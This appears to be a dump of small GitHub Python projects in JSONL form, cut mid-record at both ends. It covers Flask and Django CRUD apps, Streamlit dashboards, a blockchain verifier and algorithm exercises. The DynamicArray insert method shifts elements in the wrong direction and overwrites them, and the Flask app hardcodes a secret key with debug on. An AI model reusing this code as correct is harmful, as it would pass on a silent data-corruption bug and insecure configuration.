sizes in the bouquet\n \"\"\"\n if len(sizes) == 0:\n return 0\n\n avg_sizes = float(np.mean([x.value for x in flatten_counter(sizes)]))\n return avg_sizes / (3 * (len(FlowerSizes) - 1))\n\n def receive_feedback(self, feedback):\n \"\"\"\n :param feedback:\n :return: nothing\n \"\"\"\n \n self.feedback.append(feedback)\n","repo_name":"griff4692/coms4444_flowers","sub_path":"suitors/random_suitor.py","file_name":"random_suitor.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24615109863","text":"from sklearn.metrics import classification_report\nfrom joblib import dump, load\nfrom pathlib import Path\nimport streamlit as st\nimport pandas as pd\nimport json\n\nfrom utils.load_data import Dataload\ntable_city_climat_model = Path.cwd().parent / \"webapp\" / \"data\" / \"table_climat_city_model.csv\"\n\nPARAM_MODELS = Path.cwd().parent / \"webapp\" / \"models\" / \"models_params.json\"\npath_model = Path.cwd().parent / \"webapp\" / \"models\"\npath_df = Path.cwd().parent / \"webapp\" / \"data\" / \"data_features_webapp.csv\"\n\n\ndef instantiate_model(model_name):\n # Charger les paramètres depuis le fichier JSON\n with open(PARAM_MODELS, 'r') as f:\n params = json.load(f)[model_name.__name__]\n\n # Créer un modèle avec les paramètres spécifiés\n model = model_name(**params)\n\n # Retourner le modèle\n return model\n\n\ndef train_model(model, dataset):\n # Séparer les données en entrées et étiquettes de classe\n X_train, X_test, y_train, y_test = Dataload(dataset).split_data_train_test()\n # Entraîner le modèle\n model.fit(X_train, y_train)\n # Retourner le modèle entraîné\n print(\"Model trained\")\n return model\n\n\ndef save_model(model):\n # Sauvegarder le modèle entraîné en utilisant joblib\n model_name = model.__class__.__name__\n model_filename = f\"{model_name.lower()}_model.joblib\"\n dump(model, path_model / model_filename)\n print(\"Model saved\")\n\n\ndef load_model(filename):\n # Charger le modèle entraîné depuis le fichier\n model = load(filename)\n print(\"Model loaded\")\n return model\n\n\n# noinspection PyTypeChecker\ndef evaluate_model(model, dataset):\n X_train, X_test, y_train, y_test = Dataload(dataset).split_data_train_test()\n y_pred = model.predict(X_test)\n accuracy = model.score(X_test, y_test)\n report = classification_report(y_test, y_pred, output_dict=True)\n print('Accuracy:', f'{accuracy*100:.2f} %')\n f1_weighted = report['weighted avg'][\"f1-score\"]\n print('F1-score (weighted):', f'{f1_weighted*100:.2f} %')\n print(\"evaluate_model done\")\n return accuracy, f1_weighted\n\n\ndef apply_model(model, dataset):\n if dataset.columns.str.contains('raintomorrow').any():\n dataset = dataset.drop(columns='raintomorrow', axis=1)\n if dataset.columns.str.contains('date').any():\n dataset = dataset.drop(columns='date', axis=1)\n predictions = model.predict(dataset)\n prediction_scores = model.predict_proba(dataset)\n print(\"apply_model done\")\n dataset['raintomorrow'] = predictions\n return dataset\n\n\ndef display_scores(scores):\n # Formater les valeurs en pourcentage dans le dictionnaire\n data = {\n 'Accuracy': [f'{scores[0]:.2%}'],\n 'F1-score (weighted)': [f'{scores[1]:.2%}']\n }\n\n # Créer un DataFrame avec les scores formatés\n df_scores = pd.DataFrame(data)\n\n # Exclure l'index et centrer les colonnes\n html_table = df_scores.to_html(index=False, justify='center')\n\n # Afficher le tableau HTML\n st.write(html_table, unsafe_allow_html=True)\n\n\ndef get_model(city_or_climate):\n df_city_climat_model = Dataload(table_city_climat_model).load_df()\n row = df_city_climat_model[df_city_climat_model[\"ville\"] == city_or_climate]\n if row.empty:\n row = df_city_climat_model[df_city_climat_model[\"climat\"] == city_or_climate]\n\n # Vérifier si une correspondance a été trouvée\n if not row.empty:\n model_file = row[\"modele\"].values[0]\n # Charger le modèle à partir du fichier\n return model_file\n\n # Aucune correspondance trouvée\n return None\n\ndef get_model_name(city_or_climate):\n df_city_climat_model = Dataload(table_city_climat_model).load_df()\n row = df_city_climat_model[df_city_climat_model[\"ville\"] == city_or_climate]\n if row.empty:\n row = df_city_climat_model[df_city_climat_model[\"climat\"] == city_or_climate]\n\n # Vérifier si une correspondance a été trouvée\n if not row.empty:\n model_name = row[\"climat\"].values[0]\n # Charger le modèle à partir du fichier\n return model_name\n\n # Aucune correspondance trouvée\n return None","repo_name":"WeatherForecasterTeam/australia_weather_forecasts","sub_path":"webapp/utils/load_and_apply_model.py","file_name":"load_and_apply_model.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27570435175","text":"from dataclasses import dataclass\nimport streamlit as st\nimport pandas as pd\nfrom datetime import datetime\nimport numpy as np\nfrom statsmodels.graphics.tsaplots import plot_pacf, plot_acf\nimport matplotlib.pyplot as plt\n\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\n\nfrom data_scraper import DataScraper\n\n\n@dataclass\nclass DashBoard():\n layout: str = \"centered\"\n\n def __post_init__(self):\n st.set_page_config(layout=self.layout)\n\n self.load_data()\n return\n\n #@st.cache\n def load_data(self):\n data_scraper = DataScraper()\n self.data = data_scraper.load_data()\n self.raw_data = self.data.copy()\n\n def generate_dashboard(self):\n self.side_bar()\n self.main_page()\n\n\n def side_bar(self):\n '''\n Create side bar elements\n '''\n\n st.sidebar.markdown(\"## Sidebar\")\n\n st.sidebar.markdown(\"#\")\n self.resolution = st.sidebar.selectbox(label = 'Resolution', options=['YS','H', 'D','MS'], index=0)\n\n # Dwonload data\n st.sidebar.download_button(label='Download data', key='download', data=self.convert_df(self.data), file_name='AuroraBoralis.csv', mime='text/csv')\n\n\n\n def main_page(self):\n '''\n Create main page\n '''\n\n # self.title('Aurora Borealis', background_color='aquamarine')\n st.markdown('# Aurora borealis')\n\n self._preprocess_data()\n\n st.markdown('#')\n self._display_plot_timeseries()\n\n self._display_plot_scatter()\n self._display_plot_monthly_seasonality()\n self._display_plot_yearly_acf_pacf()\n\n\n def _preprocess_data(self):\n '''Format data according to input params'''\n self.data = self.data.resample(self.resolution).mean()\n\n\n def _display_plot_timeseries(self):\n '''\n Plot timeseries Kp, Ap\n '''\n\n fig = make_subplots(rows=2, cols=1, subplot_titles=['Kp', 'Ap'], shared_xaxes=True)\n\n fig.add_trace(\n go.Scattergl(x=self.data.index, y=self.data['Kp'],\n mode='lines',\n name='Kp',\n line={'color': 'blue'}),\n row=1, col=1\n )\n\n fig.add_trace(\n go.Scattergl(x=self.data.index, y=self.data['ap'],\n mode='lines',\n name='Ap',\n line={'color': 'red'}),\n row=2, col=1\n )\n\n # display\n st.plotly_chart(fig, use_container_width=True)\n\n\n\n\n def _display_plot_scatter(self):\n '''Plot scatter Kp/Ap'''\n fig = px.scatter(self.data, x='Kp', y='ap', title='Kp-Ap scatter')\n st.plotly_chart(fig, use_container_width=True, render_mode='webgl')\n\n def _display_plot_monthly_seasonality(self):\n '''Plot monthly seasonality'''\n\n data_month = self.raw_data.copy()\n data_month['month'] = data_month.index.month\n data_month = data_month.groupby('month').mean()\n\n fig = make_subplots(specs=[[{'secondary_y': True}]], subplot_titles=['Monthly seasonality'])\n fig.add_trace(\n go.Scatter(x=data_month.index, y=data_month['Kp'], name='Kp', line={'color': 'blue'}),\n secondary_y=False\n )\n\n fig.add_trace(\n go.Scatter(x=data_month.index, y=data_month['ap'], name='Ap', line={'color': 'red'}),\n secondary_y=True\n )\n\n # x axis label\n fig.update_xaxes(title_text='Month')\n\n # y axis label\n fig.update_yaxes(title_text='Kp', secondary_y=False)\n fig.update_yaxes(title_text='Ap', secondary_y=True)\n\n # Render\n st.plotly_chart(fig, use_container_width=True)\n\n\n def _display_plot_yearly_acf_pacf(self):\n '''Plot yearly pacf'''\n\n data_year = self.raw_data.resample('Y').mean()\n\n # Plot\n fig, ax = plt.subplots(2, 1, sharex=True)\n plot_pacf(x=data_year['Kp'], ax=ax[0])\n ax[0].set_title('PACF Kp', fontweight='bold')\n ax[0].grid(linestyle=':')\n\n plot_acf(x=data_year['Kp'], ax=ax[1])\n ax[1].set_title('ACF Kp', fontweight='bold')\n ax[1].grid(linestyle=':')\n\n # Render\n st.pyplot(fig=fig)\n\n\n\n def title(self, text: str, background_color: str = 'tomato', text_color: str = 'white') -> None:\n st.markdown(f\"

{text}

\", unsafe_allow_html=True)\n\n @st.cache\n def convert_df(self, df: pd.DataFrame):\n return df.to_csv().encode('utf-8')\n\n\n\nif __name__ == '__main__':\n\n dashboard = DashBoard(layout = \"wide\")\n dashboard.generate_dashboard()\n\n","repo_name":"clarkmaio/AuroraBorealis","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26808320583","text":"\"\"\"Blogly application.\"\"\"\n\nfrom flask import Flask, render_template, redirect, url_for, flash, request;\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import db, connectDB, Users, Posts;\nfrom forms import UserForm, PostForm;\n\napp = Flask(__name__);\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False;\napp.config['SQLALCHEMY_ECHO'] = True;\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False;\napp.config['SECRET_KEY'] = 'wtf';\n\napp.debug = True;\ntoolbar = DebugToolbarExtension(app);\n\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False;\n\nconnectDB(app); # \ndb.create_all(); # create all relations/models associated with the db Instance, https://flask-sqlalchemy.palletsprojects.com/en/2.x/api/#flask_sqlalchemy.SQLAlchemy.create_all\n\n@app.route('/')\ndef indexView():\n '''Return a list of users.'''\n return 'hi'; # fixed in a later exercise\n return '';\n\n@app.route('/users/')\ndef usersView():\n '''Show a list of users, hyperlinked.'''\n #query and then save to a variable\n usersInformation = Users.returnUserList_alpha();\n return render_template('users.html',\n usersInformation = usersInformation);\n\n@app.route('/users/new', methods=['GET', 'POST'])\ndef getNewUser():\n '''Form for creating a new user.'''\n\n form = UserForm();\n\n if form.validate_on_submit():\n \n formInformation = {\n \"firstName\": form.firstName.data,\n \"lastName\": form.lastName.data,\n \"imageURL\": form.imageLink.data\n };\n\n newUserInstance = Users(first_name=formInformation[\"firstName\"], \n last_name=formInformation[\"lastName\"], \n image_url=formInformation[\"imageURL\"]);\n\n db.session.add(newUserInstance)\n db.session.commit();\n\n flash(f'New user, {formInformation[\"firstName\"]} {formInformation[\"lastName\"]}, Created!', 'success');\n return redirect(url_for('usersView'));\n \n else:\n return render_template('forms_users.html', form=form, formCancelOption=False);\n\n@app.route('/users/', methods=['GET', 'POST']) # 'POST' allowed to shortcut from a form because it is a 'POST' request\ndef viewUser(userID):\n '''View a user by ID.'''\n\n if request.method == \"POST\":\n # destroy any information by malicious actors attempting to take advantage of this 'POST' route even though it does nothing\n request.data = None;\n\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n\n foundPosts = Posts.returnPostsByUserID(userID);\n\n return render_template('user.html',\n userInformation = selectedUser,\n userPosts = foundPosts);\n\n@app.route('/users//edit', methods=['GET', 'POST'])\ndef editUser(userID):\n '''Edit a user by ID.'''\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n\n # do a pre-render of the form\n form = UserForm(\n firstName=selectedUser.first_name, \n lastName=selectedUser.last_name, \n imageLink=selectedUser.image_url)\n\n if form.validate_on_submit():\n selectedUser.first_name = form.firstName.data;\n selectedUser.last_name = form.lastName.data;\n selectedUser.image_url = form.imageLink.data;\n db.session.commit();\n flash('Information updated.', 'success');\n return redirect(f'/users/{userID}');\n\n else:\n return render_template('forms_users.html', form=form, formCancelOption=True, userID=userID);\n\n@app.route('/users//delete')\ndef deleteUserView(userID):\n '''Delete a user by ID.'''\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n \n db.session.delete(selectedUser);\n db.session.commit();\n flash('User deleted.', 'success');\n return redirect(url_for('usersView'));\n\n# Posts\n@app.route('/posts/')\ndef viewPostView(postID):\n selectedPost = Posts.returnPostByID(postID);\n if not selectedPost: # maybe refactor and combine with \"if not selectedUser:\"\n return '404';\n \n selectedUser = Users.returnUserByID(selectedPost.author_id);\n\n return render_template('post.html', postInformation=selectedPost, userInformation=selectedUser);\n\n@app.route('/posts//edit', methods=['GET', 'POST'])\ndef editPostView(postID):\n\n selectedPost = Posts.returnPostByID(postID);\n if not selectedPost: # maybe refactor and combine with \"if not selectedUser:\"\n return '404';\n\n postFormInstance = PostForm(postTitle=selectedPost.title, postContent=selectedPost.content);\n\n if postFormInstance.validate_on_submit():\n selectedPost.updatePost(title=postFormInstance.postTitle.data, content=postFormInstance.postContent.data);\n return redirect(f'/posts/{postID}');\n else:\n return render_template('forms_posts.html',\n form=postFormInstance, postInformation=selectedPost, formType='editPost');\n\n@app.route('/users//posts/new', methods=['GET', 'POST'])\ndef newPostView(userID):\n\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n\n postFormInstance = PostForm();\n\n if postFormInstance.validate_on_submit():\n newPost = Posts(title=postFormInstance.postTitle.data, content=postFormInstance.postContent.data, author_id=userID);\n db.session.add(newPost);\n db.session.commit();\n return redirect(f'/users/{userID}');\n \n else:\n return render_template('forms_posts.html', \n userInformation=selectedUser, \n form=postFormInstance, formType='newPost');\n\n@app.route('/posts//delete')\ndef deletePostView(postID):\n \n selectedPost = Posts.returnPostByID(postID);\n if not selectedPost: # maybe refactor and combine with \"if not selectedUser:\"\n return '404';\n \n db.session.delete(selectedPost)\n db.session.commit();\n\n return redirect(url_for('usersView'));","repo_name":"YiJohnZhang/sb_u02_assignments","sub_path":"02_23.02.11_blogly_02-03/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12634188727","text":"#################################\n# PROJECT EULER - PROBLEM 078 #\n#################################\n# The solution below is based on the formula given in:\n# https://en.wikipedia.org/wiki/Partition_(number_theory)#Partition_function\n\nimport time\nfrom itertools import cycle, count\n\n\ndef pentagonal(n: int) -> int:\n return n * (3 * n - 1) // 2\n\n\ndef partition(n: int) -> int:\n global partitions\n if n <= 1:\n return 1\n if n not in partitions:\n signs = cycle([1, 1, -1, -1])\n pentagonals = [p for p in generalized_pentagonals if p <= n]\n partitions[n] = sum(sign * partition(n - p)\n for sign, p in zip(signs, pentagonals)) % 10**6\n return partitions[n]\n\n\nstart = time.time()\n\nP = 250\n\npartitions = {0: 1, 1: 1}\ngeneralized_pentagonals = \\\n sorted([k * (3 * k - 1)//2 for k in range(-P, P) if k != 0])\n\nprint(next((n for n in count(0) if partition(n) == 0)))\n\nend = time.time()\nprint(f\"Program runtime: {end - start} seconds\")\n","repo_name":"pzuehlke/Project-Euler-Solutions","sub_path":"problem_078.py","file_name":"problem_078.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73001572947","text":"# WAP to calculate compound interest annually is given by:\n# A = P(1 + R/100) t\n# Compound Interest = Amount – Principal Where,\n# A is amount\n# P is the principal amount\n# R is the rate and\n# T is the time span\n\n\ndef CompoundInterest(p, r, t):\n a = p * (pow((1 + r / 100), t))\n ci = a - p\n return ci\n\n\nprincipal = float(input(\"Enter the principal amount: \"))\nrate = float(input(\"Enter rate of interest: \"))\ntime = float(input(\"Enter time in years: \"))\nprint(f'The Compound Interest will be {CompoundInterest(principal, rate, time)}')\n","repo_name":"BeighIrtiqa/Hands-On-to-Python","sub_path":"Python_Programs/CompoundInterest.py","file_name":"CompoundInterest.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12587415080","text":"import ctypes\nfrom typing import Any\n\n\nclass DynamicArray:\n \"\"\"Dynamic array akin to a simplified Python list.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Create an empty array.\"\"\"\n self._n = 0 # number of actual elements\n self._capacity = 1 # array capacity\n self._array = self._make_array(self._capacity) # low-level array\n\n def __len__(self) -> int:\n \"\"\"Return the number of elements stored in this array.\"\"\"\n return self._n\n\n def __getitem__(self, k: int) -> Any:\n \"\"\"\n Return element at index k.\n\n Raise an error if invalid index.\n \"\"\"\n if not isinstance(k, int):\n raise TypeError(\"index must be an integer\")\n if not 0 <= k < self._n:\n raise IndexError(\"index out of range\")\n return self._array[k] # retrieve from internal array\n\n def _resize(self, c: int) -> None:\n \"\"\"Resize internal array to capacity c.\"\"\"\n new_array = self._make_array(c)\n\n # copy elements to new array\n for k in range(self._n):\n new_array[k] = self._array[k]\n\n self._array = new_array\n self._capacity = c\n\n def _make_array(self, c: int) -> ctypes.Array[Any]:\n \"\"\"Create and return low-level array with capacity c.\"\"\"\n return (c * ctypes.py_object)()\n\n def insert(self, k: int, element: object) -> None:\n \"\"\"\n Insert element at index k and shift subsequent elements rightward.\n\n Raise an error if invalid index.\n \"\"\"\n if not isinstance(k, int):\n raise TypeError(\"index must be an integer\")\n if not 0 <= k <= self._n:\n raise IndexError(\"index out of range\")\n if self._n == self._capacity: # not enough room\n self._resize(2 * self._capacity) # double capacity\n\n # shift elements\n for j in range(k, self._n):\n self._array[j + 1] = self._array[j]\n\n self._array[k] = element\n self._n += 1\n\n def append(self, element: object) -> None:\n \"\"\"Add element to the end of this array.\"\"\"\n self.insert(self._n, element)\n\n def remove(self, element: object) -> None:\n \"\"\"\n Remove first occurrence of element.\n\n Raise ValueError if element is not found.\n \"\"\"\n for k in range(self._n):\n if self._array[k] == element:\n for j in range(k, self._n - 1): # shift to fill gap\n self._array[j] = self._array[j + 1]\n self._array[self._n - 1] = None # help garbage collection\n self._n -= 1\n return # exit immediately\n raise ValueError(\"element not found\") # only reached if no match\n","repo_name":"alexbouayad/algorithms-mypy","sub_path":"array/dynamic.py","file_name":"dynamic.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39984629222","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom app import settings\nfrom app.settings import BUS_STATION_CSV\nfrom django.core.paginator import Paginator\n\n\ndef index(request):\n return redirect(reverse(bus_stations))\n\n\ndef data_base():\n bus_base = []\n with open(BUS_STATION_CSV, 'r', encoding=\"cp1251\") as file:\n file.readline()\n for data in file:\n name = data.split(';')[1].split('»')[0][1:]+'»'\n street = data.split(';')[1].split('», ')[-1][:-1]\n district = data.split(';')[6]\n bus_base.append({'Name': name, 'Street': street, 'District': district})\n return bus_base\n\n\nnew_base = data_base()\n\n\ndef bus_stations(request):\n bus_station_list = []\n current_page = request.GET.get('page', '1')\n mark_start = int(current_page) * settings.STR_PER_PAGE - settings.STR_PER_PAGE\n mark_end = int(current_page) * settings.STR_PER_PAGE\n max_mark = round(len(new_base) / settings.STR_PER_PAGE + 0.5)\n\n for data in new_base[mark_start: mark_end]:\n bus_station_list.append(data)\n\n if int(current_page) <= 1:\n prev_page_url = None\n else:\n prev_page_url = str(f'?page={int(current_page)-1}')\n if int(current_page) >= max_mark:\n next_page_url = None\n else:\n next_page_url = str(f'?page={int(current_page) + 1}')\n\n return render(request, 'index.html', context={\n 'bus_stations': bus_station_list,\n 'current_page': f'',\n 'prev_page_url': prev_page_url,\n 'next_page_url': next_page_url,\n })\n\n\ndef pagi_view(request):\n number = request.GET.get('page')\n paginator = Paginator(new_base, settings.STR_PER_PAGE)\n pagi = paginator.get_page(number)\n msg = pagi.object_list\n if pagi.has_next():\n next_number = f'?page={pagi.next_page_number()}'\n else:\n next_number = None\n if pagi.has_previous():\n previous_number = f'?page={pagi.previous_page_number()}'\n else:\n previous_number = None\n return render(request, 'index.html', context={\n 'bus_stations': msg,\n 'current_page': pagi,\n 'prev_page_url': previous_number,\n 'next_page_url': next_number,\n })\n","repo_name":"devitos/HW_pagination","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"646583097","text":"#N개의 원소를 포함하고 있는 수열이 오름차순으로 정렬되어 있다. 이때 이 술열에서 x가 등장하는 횟수를 계산하세요.\n#예를 들어 수열 {1,1,2,2,2,2,3}이 있을 때 x=2라면, 현재 수열에서 값이 2인 원소가 4개이므로 4를 출력합니다.\n#단 이 문제는 시간 복잡도 O(logN)으로 알고리즘을 설계하지 않으면 시간 초과 판정을 받습니다.\n#n은 100만까지 이다.\n\n#풀이\nfrom bisect import bisect_left,bisect_right\n\n#값이 [left_value, right_value]인 데이터의 개수를 반환하는 함수\ndef count_by_range(array,left_value,right_value):\n right_index = bisect_right(array,right_value)\n left_index = bisect_left(array,left_value)\n return right_index-left_index\n\nn,x = map(int,input().split())\narray = list(map(int,input().split()))\n\n#찾고 싶어하는 정수 값\ncount = count_by_range(array,x,x)\n\n#값이 존재하지 않는다면 -1\nif count == 0:\n print(-1)\nelse:\n print(count)","repo_name":"YeongM/PythonPractice","sub_path":"BinarySearch/문제2.py","file_name":"문제2.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5006352032","text":"import random\n\n# A bullet of mass m1 g and speed v1 m/s is fired into a door and gets embedded exactly at the centre of the door. The door is l m wide and weighs m kg. It is hinged at one end and rotates about a vertical axis practically without friction. Find the angular speed of the door just after the bullet embeds into it.\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\n\nno_of_samples = 500000\n\ndef cal1(m1, m2, v1, l) :\n am = (m1*v1*l)/(1000*2)\n i = (m2*l*l)/3\n return round(am/i,1)\n\ndef type1() :\n m1 = random.randint(1,500)\n m2 = random.randint(1,100)\n l = random.randint(1,100)\n v1 = random.randint(1000,1500)\n q = \"A bullet of mass \" + str(m1) + \" g and speed \" + str(v1) + \" m/s is fired into a door and gets embedded at centre of the door. The door is \" + str(l) + \" m wide and weighs \" + str(m2) + \" kg. It is hinged at one end and rotates about a vertical axis. Find the angular speed of the door just after the bullet embeds into it.\\n\"\n a = str(cal1(m1, m2, v1, l)) + \" rad/s\\n\"\n return q,a\n\nfor i in range(no_of_samples):\n ques, answer = type1()\n qns.write(ques)\n ans.write(answer)\n\nqns.close()\nans.close()\n","repo_name":"misterpawan/scimat2","sub_path":"science/RotationalMotion/bullet_block_angvel/bullet_block_angvel.py","file_name":"bullet_block_angvel.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"74904225745","text":"#coding=utf-8\nfrom uliweb.orm import *\nfrom uliweb.utils.common import get_var\nfrom uliweb.i18n import ugettext_lazy as _\n\nclass Cron_Job(Model):\n title = Field(str, max_length=300, verbose_name=_('Title'), required=True)\n time = Field(str, max_length=20, verbose_name=_('Time'), required=True) #m h d M w\n\n instances = ManyToMany('async_tasks', reference_fieldname='task_id')\n timeout = Field(int, verbose_name=_('Timeout')) #毫秒\n\n modified_user = Reference('user', verbose_name=_('Modified User'))\n modified_time = Field(DATETIME, verbose_name=_('Modified Time'),\n auto_now=True, auto_now_add=True)\n enabled = Field(bool, verbose_name=_('Enabled'))\n version = Field(int)\n\n def __unicode__(self):\n return self.title\n\n class AddForm:\n fields = [\n 'title', 'time',\n ]\n\n class EditForm:\n fields = [\n 'title', 'time', 'enabled'\n ]\n\n class Table:\n fields = [\n {'name':'time', 'width':80},\n {'name':'title', 'width':300},\n {'name':'enabled', 'width':120},\n {'name':'action', 'width':120},\n ]\n\n\nclass Cron_Task(Model):\n ##UUID string\n id = Field(str, max_length=36, verbose_name=_('ID'), primary_key=True,\n index=True, unique=True)\n label = Field(str, max_length=300, verbose_name=_('Label'))\n cron_job = Reference('cron_job', verbose_name=_('Cron Job'), collection_name='tasks')\n depend_tasks = Field(JSON, verbose_name=_('Depend Tasks'),\n default=[]) #[id, id, ...]\n # parent_task = Reference(verbose_name=_('Parent Task'), collection_name='children')\n # children_count = Field(int, verbose_name=_('Children Count'))\n command = Field(str, max_length=1000, verbose_name=_('Command'))\n work_directory = Field(str, max_length=1000, verbose_name=_('Work Directory'))\n queue = Field(str, max_length=256, verbose_name=_('Queue'))\n timeout = Field(int, verbose_name=_('Timeout')) #毫秒\n\n modified_user = Reference('user', verbose_name=_('Modified User'))\n modified_time = Field(DATETIME, verbose_name=_('Modified Time'),\n auto_now=True, auto_now_add=True)\n\n def __unicode__(self):\n return self.label\n\n","repo_name":"limodou/uliweb-apps","sub_path":"uliweb_apps/cron/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71386973265","text":"from django.shortcuts import render, redirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nimport random\nfrom .models import Photo\n\ndef home(request):\n return render(request, 'home.html')\n\ndef aboutus(request):\n return render(request, 'aboutus.html')\n\ndef movie(request) :\n value = 'movie'\n movieList = {}\n\n movieList[1] = '토이스토리'\n movieList[2] = '스파이더맨'\n movieList[3] = '코코'\n movieList[4] = '레미제라블'\n movieList[5] = '타이타닉'\n movieList[6] = '알라딘'\n movieList[7] = '겨울왕국'\n movieList[8] = '라푼젤'\n i = random.randint(1,8)\n\n img_name = movieList[i] + \".jpg\"\n\n return render(request, 'movie.html', {'movieList' : movieList[i], 'img_name' : img_name})\n\n\ndef food(request):\n value = 'food'\n foodList = {}\n foodList[1] = '떡볶이'\n foodList[2] = '우동'\n foodList[3] = '피자'\n foodList[4] = '곱창'\n foodList[5] = '돈가스'\n foodList[6] = '라면'\n foodList[7] = '롤초밥'\n foodList[8] = '부대찌개'\n foodList[9] = '샐러드'\n foodList[10] = '쌀국수'\n foodList[11] = '스테이크'\n foodList[12] = '제육볶음'\n foodList[13] = '짜장면'\n foodList[14] = '초밥'\n foodList[15] = '양념치킨'\n foodList[16] = '순대국'\n foodList[17] = '짬뽕'\n foodList[18] = '초밥'\n foodList[19] = '팟타이'\n foodList[20] = '팬케이크'\n foodList[21] = '해장국'\n foodList[22] = '제육볶음'\n foodList[23] = '라면'\n foodList[24] = '삼겹살' \n foodList[25] = '햄버거' \n i = random.randint(1,25)\n\n img_name = foodList[i] + \".PNG\"\n\n return render(request,'food.html',{'foodList':foodList[i], 'img_name' : img_name})\n\ndef new (request):\n if request.method == 'POST' :\n\n myfile1 = request.FILES.get('image1', '')\n myfile2 = request.FILES.get('image2', '')\n myfile3 = request.FILES.get('image3', '')\n myfile4 = request.FILES.get('image4', '')\n\n picturelist = {}\n picturelist[1] = myfile1\n picturelist[2] = myfile2\n picturelist[3] = myfile3\n picturelist[4] = myfile4\n\n i = random.randint(1,4)\n myfile = picturelist[i]\n\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'newresult.html', {'uploaded_file_url': uploaded_file_url})\n else :\n return render(request, 'new.html')\n\n\ndef photo(request):\n photo = Photo.objects\n return render(request, 'home.html',{'photo':photo})\n\n","repo_name":"KangSuzy/Choice-Maker","sub_path":"choicemaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1761251696","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n'''\n改进的冒泡排序\n'''\n\n\ndef bubble_sort_advance(lists):\n count = len(lists)\n for i in range(count): # 从0开始排序\n found = False\n for j in range(1, count - i):\n if lists[j - 1] > lists[j]:\n lists[j - 1], lists[j] = lists[j], lists[j - 1]\n print(\"排序过程:\", lists)\n found = True\n if not found:\n break\n\n return lists\n\n\na = [6, 1, 2, 7, 9, 3, 4, 5, 10, 8]\nprint(\"排序前:\", a)\nb = bubble_sort_advance(a)\nprint(\"排序后\", b)\n","repo_name":"lindo-zy/Data-structure-and-algorithm","sub_path":"Sort/bubble_sort_advance.py","file_name":"bubble_sort_advance.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"22852506197","text":"from wallet import Wallet\nfrom helpers.util import hash_string_256, hash_block\n\n\n\nclass Verification:\n\n @staticmethod\n def valid_proof( transactions, last_hash, proof):\n\n guess = (str([tx.to_ordered_dict() for tx in transactions]) + str(last_hash) + str(proof)).encode()\n guess_hash = hash_string_256(guess)\n return guess_hash[0:2] == '00'\n\n\n\n\n @classmethod \n def verify_chain(clss, blockchain):\n\n for (index, block) in enumerate(blockchain):\n if index == 0:\n continue\n if block.previous_hash != hash_block(blockchain[index - 1]):\n return False\n if not clss.valid_proof(block.transactions[:-1], block.previous_hash, block.proof):\n print('Invalid proof')\n return False\n return True\n\n\n @staticmethod\n def verify_transaction( transaction, get_balance, check_funds=True):\n\n if check_funds:\n sender_balance = get_balance(transaction.sender)\n return sender_balance >= transaction.amount and Wallet.verify_trans(transaction)\n else:\n return Wallet.verify_trans(transaction)\n\n\n \n\n @classmethod\n def verify_transactions(clss, open_transactions, get_balance):\n return all([clss.verify_transaction(tx, get_balance, False) for tx in open_transactions])","repo_name":"beeshaker/farmscoin","sub_path":"helpers/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21057991056","text":"__all__ = ['verify_signature', 'decrypt_content', 